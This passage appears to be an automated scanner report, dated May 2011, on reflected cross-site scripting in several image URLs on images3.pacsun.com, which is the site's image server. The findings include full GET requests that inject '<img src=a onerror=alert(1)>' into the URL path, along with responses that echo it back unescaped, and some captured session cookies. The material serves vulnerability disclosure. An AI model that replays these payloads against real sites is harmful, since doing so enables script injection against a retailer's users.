User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:30 GMT
Connection: close

Unable to find /pacsun/headerEmailV3_envelope1b809<img src=a onerror=alert(1)>7f5d0e54d25

5.20. http://images3.pacsun.com/is/image/pacsun/homePromo1_051211 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homePromo1_051211

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70522<img%20src%3da%20onerror%3dalert(1)>1618e1c19ba was submitted in the REST URL parameter 4. This input was echoed as 70522<img src=a onerror=alert(1)>1618e1c19ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/homePromo1_05121170522<img%20src%3da%20onerror%3dalert(1)>1618e1c19ba?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:03 GMT
Connection: close

Unable to find /pacsun/homePromo1_05121170522<img src=a onerror=alert(1)>1618e1c19ba

5.21. http://images3.pacsun.com/is/image/pacsun/homePromo2_051311 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homePromo2_051311

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f149<img%20src%3da%20onerror%3dalert(1)>9fdfccbd9ba was submitted in the REST URL parameter 4. This input was echoed as 1f149<img src=a onerror=alert(1)>9fdfccbd9ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/homePromo2_0513111f149<img%20src%3da%20onerror%3dalert(1)>9fdfccbd9ba?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:05 GMT
Connection: close

Unable to find /pacsun/homePromo2_0513111f149<img src=a onerror=alert(1)>9fdfccbd9ba

5.22. http://images3.pacsun.com/is/image/pacsun/logo_v3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/logo_v3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5c82<img%20src%3da%20onerror%3dalert(1)>685bea3b981 was submitted in the REST URL parameter 4. This input was echoed as b5c82<img src=a onerror=alert(1)>685bea3b981 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/logo_v3b5c82<img%20src%3da%20onerror%3dalert(1)>685bea3b981?$img_png-alpha$&$ext=.png HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 74
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:29 GMT
Connection: close

Unable to find /pacsun/logo_v3b5c82<img src=a onerror=alert(1)>685bea3b981

5.23. http://images3.pacsun.com/is/image/pacsun/mainNav2_arrivals3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_arrivals3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload abe3a<img%20src%3da%20onerror%3dalert(1)>af65108d6c1 was submitted in the REST URL parameter 4. This input was echoed as abe3a<img src=a onerror=alert(1)>af65108d6c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_arrivals3Offabe3a<img%20src%3da%20onerror%3dalert(1)>af65108d6c1?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:41 GMT
Connection: close

Unable to find /pacsun/mainNav2_arrivals3Offabe3a<img src=a onerror=alert(1)>af65108d6c1

5.24. http://images3.pacsun.com/is/image/pacsun/mainNav2_brands3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_brands3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a896f<img%20src%3da%20onerror%3dalert(1)>e95d4b07ad3 was submitted in the REST URL parameter 4. This input was echoed as a896f<img src=a onerror=alert(1)>e95d4b07ad3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_brands3Offa896f<img%20src%3da%20onerror%3dalert(1)>e95d4b07ad3?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:49 GMT
Connection: close

Unable to find /pacsun/mainNav2_brands3Offa896f<img src=a onerror=alert(1)>e95d4b07ad3

5.25. http://images3.pacsun.com/is/image/pacsun/mainNav2_collective3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_collective3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9308e<img%20src%3da%20onerror%3dalert(1)>4e797c2cb8e was submitted in the REST URL parameter 4. This input was echoed as 9308e<img src=a onerror=alert(1)>4e797c2cb8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_collective3Off9308e<img%20src%3da%20onerror%3dalert(1)>4e797c2cb8e?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 90
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:09 GMT
Connection: close

Unable to find /pacsun/mainNav2_collective3Off9308e<img src=a onerror=alert(1)>4e797c2cb8e

5.26. http://images3.pacsun.com/is/image/pacsun/mainNav2_mens3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_mens3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 215c2<img%20src%3da%20onerror%3dalert(1)>dc39dea2f35 was submitted in the REST URL parameter 4. This input was echoed as 215c2<img src=a onerror=alert(1)>dc39dea2f35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_mens3Off215c2<img%20src%3da%20onerror%3dalert(1)>dc39dea2f35?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:34 GMT
Connection: close

Unable to find /pacsun/mainNav2_mens3Off215c2<img src=a onerror=alert(1)>dc39dea2f35

5.27. http://images3.pacsun.com/is/image/pacsun/mainNav2_sale3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_sale3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1312d<img%20src%3da%20onerror%3dalert(1)>4d44989ac33 was submitted in the REST URL parameter 4. This input was echoed as 1312d<img src=a onerror=alert(1)>4d44989ac33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_sale3Off1312d<img%20src%3da%20onerror%3dalert(1)>4d44989ac33?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:42 GMT
Connection: close

Unable to find /pacsun/mainNav2_sale3Off1312d<img src=a onerror=alert(1)>4d44989ac33

5.28. http://images3.pacsun.com/is/image/pacsun/mainNav2_shoes3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_shoes3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70c59<img%20src%3da%20onerror%3dalert(1)>6492a3bd5c9 was submitted in the REST URL parameter 4. This input was echoed as 70c59<img src=a onerror=alert(1)>6492a3bd5c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_shoes3Off70c59<img%20src%3da%20onerror%3dalert(1)>6492a3bd5c9?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:31 GMT
Connection: close

Unable to find /pacsun/mainNav2_shoes3Off70c59<img src=a onerror=alert(1)>6492a3bd5c9

5.29. http://images3.pacsun.com/is/image/pacsun/mainNav2_surf3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_surf3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae557<img%20src%3da%20onerror%3dalert(1)>aec779990ce was submitted in the REST URL parameter 4. This input was echoed as ae557<img src=a onerror=alert(1)>aec779990ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_surf3Offae557<img%20src%3da%20onerror%3dalert(1)>aec779990ce?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:25 GMT
Connection: close

Unable to find /pacsun/mainNav2_surf3Offae557<img src=a onerror=alert(1)>aec779990ce

5.30. http://images3.pacsun.com/is/image/pacsun/mainNav2_swim3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_swim3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c95c0<img%20src%3da%20onerror%3dalert(1)>8c10e31f2ec was submitted in the REST URL parameter 4. This input was echoed as c95c0<img src=a onerror=alert(1)>8c10e31f2ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_swim3Offc95c0<img%20src%3da%20onerror%3dalert(1)>8c10e31f2ec?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:37 GMT
Connection: close

Unable to find /pacsun/mainNav2_swim3Offc95c0<img src=a onerror=alert(1)>8c10e31f2ec

5.31. http://images3.pacsun.com/is/image/pacsun/mainNav2_womens3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_womens3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f9702<img%20src%3da%20onerror%3dalert(1)>08c67d0bd9c was submitted in the REST URL parameter 4. This input was echoed as f9702<img src=a onerror=alert(1)>08c67d0bd9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_womens3Offf9702<img%20src%3da%20onerror%3dalert(1)>08c67d0bd9c?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:34 GMT
Connection: close

Unable to find /pacsun/mainNav2_womens3Offf9702<img src=a onerror=alert(1)>08c67d0bd9c

5.32. http://images3.pacsun.com/is/image/pacsun/newPromo_042811 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/newPromo_042811

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e5ba6<img%20src%3da%20onerror%3dalert(1)>f5ab3ce03c0 was submitted in the REST URL parameter 4. This input was echoed as e5ba6<img src=a onerror=alert(1)>f5ab3ce03c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/newPromo_042811e5ba6<img%20src%3da%20onerror%3dalert(1)>f5ab3ce03c0?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:43 GMT
Connection: close

Unable to find /pacsun/newPromo_042811e5ba6<img src=a onerror=alert(1)>f5ab3ce03c0

5.33. http://images3.pacsun.com/is/image/pacsun/pop_email_011011b [REST URL parameter 4]  previous  next

Summary

Severity:   High
